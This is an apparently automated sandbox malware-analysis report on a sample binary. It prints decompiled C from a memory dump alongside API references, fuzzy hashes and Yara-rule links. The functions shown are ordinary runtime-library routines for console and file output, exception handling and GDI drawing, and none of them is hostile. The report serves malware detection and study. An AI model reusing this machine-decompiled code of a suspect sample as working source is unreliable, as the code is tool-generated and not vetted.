								_t73 = ( *_t292 & 0x000000ff) + 0x1c47b0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x1c62e0 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E001B8980( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x1c47b0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x1c62e0 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E001AF6B0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x1c62e0 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E001B8980( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E001B5A29(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E001ADB25(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x001b69c6
0x001b69c8
0x001b69d3
0x001b69d4
0x001b69d7
0x001b69dc
0x001b69de
0x001b69e4
0x001b69e8
0x001b69ee
0x001b69f3
0x001b69f9
0x001b69fc
0x001b69ff
0x001b6a02
0x001b6a05
0x001b6a08
0x001b6a12
0x001b6a19
0x001b6a21
0x001b6a24
0x001b6a2a
0x001b6a2e
0x001b6a31
0x001b6a35
0x001b6a35
0x001b6a3d
0x001b6a45
0x001b6a4a
0x001b6a4b
0x001b6a4c
0x001b6a4d
0x001b6a50
0x001b6a52
0x001b6a58
0x001b6a5e
0x001b6a61
0x001b6a63
0x001b6a66
0x001b6a6f
0x001b6a75
0x001b6a78
0x001b6a7f
0x001b6a86
0x001b6a89
0x001b6bc3
0x001b6bc7
0x001b6bca
0x001b6bed
0x001b6bf3
0x001b6bf5
0x001b6bf9
0x001b6c2a
0x001b6c2d
0x001b6c2f
0x00000000
0x001b6bfb
0x001b6bfb
0x001b6bfe
0x001b6c01
0x001b6c04
0x001b6d4e
0x001b6d5c
0x001b6d65
0x001b6c0a
0x001b6c14
0x001b6c19
0x001b6c1c
0x001b6c1f
0x001b6c25
0x00000000
0x001b6c25
0x001b6c1f
0x001b6c04
0x001b6bcc
0x001b6bd3
0x001b6bd6
0x001b6bd9
0x001b6bdb
0x001b6bde
0x001b6be5
0x001b6be7
0x001b6c30
0x001b6c33
0x001b6c34
0x001b6c39
0x001b6c3c
0x001b6c3f
0x001b6c45
0x00000000
0x001b6c45
0x001b6c3f
0x001b6a8f
0x001b6a92
0x001b6a94
0x001b6a96
0x001b6a9a
0x001b6a9b
0x001b6a9f
0x00000000
0x00000000
0x00000000
0x001b6a9f
0x001b6aa4
0x001b6aa6
0x001b6aab
0x001b6b6b
0x001b6b72
0x001b6b73
0x001b6b76
0x001b6b78
0x001b6d28
0x001b6d2a
0x00000000
0x001b6d2c
0x001b6d2c
0x001b6d2f
0x001b6d3e
0x001b6d42
0x001b6d43
0x001b6d43
0x00000000
0x001b6d47
0x00000000
0x001b6b7e
0x001b6b83
0x001b6b86
0x001b6b89
0x001b6b8f
0x001b6b98
0x001b6ba3
0x001b6ba8
0x001b6bab
0x001b6bae
0x001b6bb7
0x001b6bb7
0x001b6bba
0x00000000
0x001b6bba
0x001b6bae
0x001b6ab1
0x001b6ab4
0x001b6aba
0x001b6abc
0x001b6ac9
0x001b6aca
0x001b6acd
0x001b6ad0
0x001b6ad5
0x001b6cf9
0x001b6cfb
0x001b6cfd
0x001b6d00
0x001b6d03
0x001b6d0f
0x001b6d12
0x001b6d14
0x001b6d15
0x001b6d19
0x001b6d1c
0x001b6d1c
0x001b6d20
0x001b6d20
0x001b6d20
0x001b6d23
0x001b6d23
0x001b6adb
0x001b6adb
0x001b6ade
0x001b6ae0
0x001b6ae3
0x001b6ae5
0x001b6ae9
0x001b6aea
0x001b6aeb
0x001b6aef
0x001b6af4
0x001b6afe
0x001b6b03
0x001b6b06
0x001b6b06
0x001b6b09
0x001b6b0c
0x001b6b0e
0x001b6b11
0x001b6b1a
0x001b6b1e
0x001b6b1f
0x001b6b26
0x001b6b2c
0x001b6b34
0x001b6b3f
0x001b6b44
0x001b6b4f
0x001b6b54
0x001b6b5a
0x001b6b63
0x001b6bbd
0x001b6bbd
0x001b6c48
0x001b6c4d
0x001b6c5f
0x001b6c64
0x001b6c67
0x001b6c6c
0x001b6c87
0x001b6d6a
0x001b6d70
0x001b6c8d
0x001b6c8d
0x001b6c98
0x001b6c9a
0x001b6c9d
0x001b6ca6
0x001b6cb0
0x00000000
0x001b6cb2
0x001b6cb4
0x001b6cb6
0x001b6ccf
0x00000000
0x001b6cd5
0x001b6cd9
0x001b6cdf
0x001b6ce2
0x001b6ce8
0x001b6ceb
0x00000000
0x001b6ceb
0x001b6cd9
0x001b6ccf
0x001b6cb0
0x001b6ca6
0x001b6c87
0x001b6c6c
0x001b6b5a
0x001b6ad5
0x001b6aab
0x00000000
0x001b6cee
0x001b6cee
0x001b6cf7
0x001b6d72
0x001b6d77
0x001b6d7f
0x001b6d80
0x001b6d81
0x001b6d8d
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(33DA424A,?,00000000,?), ref: 001B6A24

Part of subcall function 001B5A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001B649D,?,00000000,-00000008), ref: 001B5AD5

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001B6C7F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001B6CC7
GetLastError.KERNEL32 ref: 001B6D6A

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9d69d8ba0a2772f0b0ecf5ac50020f9226da9fe7a00baac01034cad6405548fd
Instruction ID: d25c1e54e2ce3d45db6607a7f9634836a9eb800e59569c3fb9adb0fdea4021be
Opcode Fuzzy Hash: 9d69d8ba0a2772f0b0ecf5ac50020f9226da9fe7a00baac01034cad6405548fd
Instruction Fuzzy Hash: 13D15875E002589FCF15CFE8D880AEDBBB5FF19314F18452AE856EB251D734A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B78AB Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E001B78AB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x1c3388);
				E001AD900(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E001AF6B0(_t107, E001ADD40(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E001AF6B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x1c5dcc; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x1c7000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E001B1BDC(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x1c33a8);
									E001AD900(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E001B78AB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E001B733D(_t103, _t108[0x18], E001ADD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E001B734D(_t103, _t108[0x18], E001ADD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E001ADD40();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x001b78ab
0x001b78ad
0x001b78b2
0x001b78b7
0x001b78b9
0x001b78bc
0x001b78c1
0x001b79d1
0x001b79d1
0x001b79d1
0x00000000
0x001b78d0
0x001b78d0
0x001b78d5
0x001b78df
0x001b78e1
0x001b78e6
0x001b78eb
0x001b78eb
0x001b78ed
0x001b78f0
0x001b78f5
0x001b7917
0x001b7917
0x001b791a
0x001b791d
0x001b793b
0x001b793e
0x001b797d
0x001b7980
0x001b7983
0x001b79a8
0x001b79aa
0x00000000
0x001b79ac
0x001b79ac
0x001b79ae
0x00000000
0x001b79b0
0x001b79b0
0x001b79b5
0x001b79b9
0x001b79b9
0x001b79ba
0x00000000
0x001b79ba
0x001b79ae
0x001b7985
0x001b7985
0x001b7987
0x00000000
0x001b7989
0x001b7989
0x001b798b
0x00000000
0x001b798d
0x001b799e
0x00000000
0x001b79a3
0x001b798b
0x001b7987
0x001b7940
0x001b7940
0x001b7944
0x00000000
0x001b794a
0x001b794a
0x001b794c
0x00000000
0x001b7952
0x001b7959
0x001b7961
0x001b7965
0x001b7967
0x001b796a
0x001b796f
0x001b7970
0x00000000
0x001b7970
0x001b796a
0x00000000
0x001b7965
0x001b794c
0x001b7944
0x001b791f
0x001b791f
0x00000000
0x001b791f
0x001b78fc
0x001b78fc
0x001b7901
0x001b7906
0x00000000
0x001b7908
0x001b790a
0x001b7913
0x001b7922
0x001b7924
0x001b79e3
0x001b79e3
0x001b79e8
0x001b79e9
0x001b79eb
0x001b79f0
0x001b79f5
0x001b79f8
0x001b79fb
0x001b79fe
0x001b7a07
0x001b7a07
0x001b7a00
0x001b7a00
0x001b7a00
0x001b7a0a
0x001b7a0e
0x001b7a11
0x001b7a12
0x001b7a13
0x001b7a14
0x001b7a17
0x001b7a20
0x001b7a20
0x001b7a23
0x001b7a59
0x001b7a25
0x001b7a25
0x001b7a25
0x001b7a28
0x001b7a3f
0x001b7a3f
0x001b7a28
0x001b7a5e
0x001b7a68
0x001b7a74
0x001b7932
0x001b7932
0x001b7937
0x001b7938
0x001b7972
0x001b7979
0x001b79bd
0x001b79bd
0x001b79c4
0x001b79d3
0x001b79d6
0x001b79e2
0x001b79e2
0x001b7924
0x001b7906
0x00000000
0x00000000
0x00000000
0x001b78d5

APIs

___AdjustPointer.LIBCMT ref: 001B7972
___AdjustPointer.LIBCMT ref: 001B7995
___AdjustPointer.LIBCMT ref: 001B7A31

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f5d3fb7e256501609351caed3f90d8d31eda9f96b22642cb3b031d0a8010c3eb
Instruction ID: 5c164dc8db0dd57319a19690db3a12ee208eaa7efb7922b623d5157d80461b71
Opcode Fuzzy Hash: f5d3fb7e256501609351caed3f90d8d31eda9f96b22642cb3b031d0a8010c3eb
Instruction Fuzzy Hash: 00511272608202AFDB298F50D841BFE77A5FF90724F14442DE8468B6D1E731ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001AB280 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 001AB31B
SetBkColor.GDI32 ref: 001AB37B
SetTextColor.GDI32 ref: 001AB3A6
SelectObject.GDI32 ref: 001AB3EE

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ColorObjectSelect$Text
String ID:
API String ID: 2688426544-0
Opcode ID: 80b59a929da4ec1f092b1090aef60dc87d4fad5aeffb1f250beefac6d21e0ded
Instruction ID: cc230573b68476b63571b5e88b039f8c6655ac8c77270483f690832f5f0d44aa
Opcode Fuzzy Hash: 80b59a929da4ec1f092b1090aef60dc87d4fad5aeffb1f250beefac6d21e0ded
Instruction Fuzzy Hash: CD519478A04208EFCB04DF68C598AACBBF1FF49314F15846DE8899B352DB31E981DB41

Uniqueness

Uniqueness Score: -1.00%

Function 001B8F6D Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001B8F6D(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x1c48b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E001B8FE1();
					E001B8FC2();
					_t13 = WriteConsoleW( *0x1c48b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x001b8f8a
0x001b8f8e
0x001b8f9b
0x001b8fa0
0x001b8fbb
0x001b8fbb
0x001b8fc1

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000), ref: 001B8F84
GetLastError.KERNEL32(?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?,?,?,001B6709,?), ref: 001B8F90

Part of subcall function 001B8FE1: CloseHandle.KERNEL32(FFFFFFFE,001B8FA0,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?,?), ref: 001B8FF1

___initconout.LIBCMT ref: 001B8FA0

Part of subcall function 001B8FC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B8F5E,001B8ABF,?,?,001B6DBE,?,?,00000000,?), ref: 001B8FD5

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?), ref: 001B8FB5

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f3b01c42e9531fbc5cf23350c6e23174c26add272ad9dc68509895dd72ff601b
Instruction ID: 119eeba0d6ffd09fecfebff7ad7acafe3fcb2c2c479c6e669aea6b3347721881
Opcode Fuzzy Hash: f3b01c42e9531fbc5cf23350c6e23174c26add272ad9dc68509895dd72ff601b
Instruction Fuzzy Hash: 4FF01C36140164BBCF222FD5EC08DE97F6AFB097A1B004014FE0986571CB32CC60EB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A7930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 001A79EF
_strlen.LIBCMT ref: 001A7AEC

Strings

(, xrefs: 001A7A60

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: _strlen
String ID: (
API String ID: 4218353326-3887548279
Opcode ID: 1fde69d4ba4e82fbc1b489a49b6b3f2aef78716e35069673ad783f560d1d8dc6
Instruction ID: 1c078065192d79f1c54e6d6c7999b3ad5aaeae46f616b92c2133e7db4f7a287b
Opcode Fuzzy Hash: 1fde69d4ba4e82fbc1b489a49b6b3f2aef78716e35069673ad783f560d1d8dc6
Instruction Fuzzy Hash: 51510675904209ABCB15DF58C882BADBBF0FF44314F08C969E8A9DB390D334EA95CB45

Uniqueness

Uniqueness Score: -1.00%

Function 001B771B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E001B771B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				E001B20D7(_a12);
				_pop(_t54);
				_t37 = E001B1C6E(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E001B7A82(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0x1c7000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L001B731A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}

0x001b7724
0x001b7729
0x001b772a
0x001b772f
0x001b7734
0x001b7744
0x001b776c
0x001b7797
0x001b77b7
0x001b77bd
0x001b77f9
0x001b780d
0x00000000
0x001b77ca
0x001b77cd
0x001b77d2
0x00000000
0x00000000
0x001b77ec
0x00000000
0x001b77f4
0x001b77bd
0x001b779b
0x001b77a2
0x001b77ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b77a2
0x001b7771
0x001b7787
0x001b778c
0x00000000
0x001b7815
0x001b7815
0x00000000
0x001b7817

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 001B7724

Strings

csm, xrefs: 001B77B7
csm, xrefs: 001B7746

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 3d45532924c616828b8b95bf36dcb27bd78c0ac1b1a3de91fe2e8c3b410b996d
Instruction ID: badf7df6dfd49ca913f1f0e428f7cf2d334ce2cb9d95074ea7dafb678120621f
Opcode Fuzzy Hash: 3d45532924c616828b8b95bf36dcb27bd78c0ac1b1a3de91fe2e8c3b410b996d
Instruction Fuzzy Hash: 37314632408205EBCF269F51DC488EE7B66FF88315B188A5AFC14492A1C732CCA1DF91

Uniqueness

Uniqueness Score: -1.00%

Function 001A4940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

EnumFontFamiliesExW.GDI32 ref: 001A49D6

Strings

1, xrefs: 001A4972
\, xrefs: 001A4961

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: EnumFamiliesFont
String ID: 1$\
API String ID: 2229041460-1239263948
Opcode ID: 2bb565df0993e88687f746d65e97da0b9e12119b327016b435585f529d199712
Instruction ID: af0bffe7ebda23281a89a360e80dd925246255723e27d2b1eebdbb401f5da1cd
Opcode Fuzzy Hash: 2bb565df0993e88687f746d65e97da0b9e12119b327016b435585f529d199712
Instruction Fuzzy Hash: 61416E78A04208DFDB14DF58C084AAABBF0FF49354F15C46EE8898B362D775A985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A7480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 001A7575
GetLastError.KERNEL32 ref: 001A7587

Strings

write failed: %lu, xrefs: 001A758D

Memory Dump Source

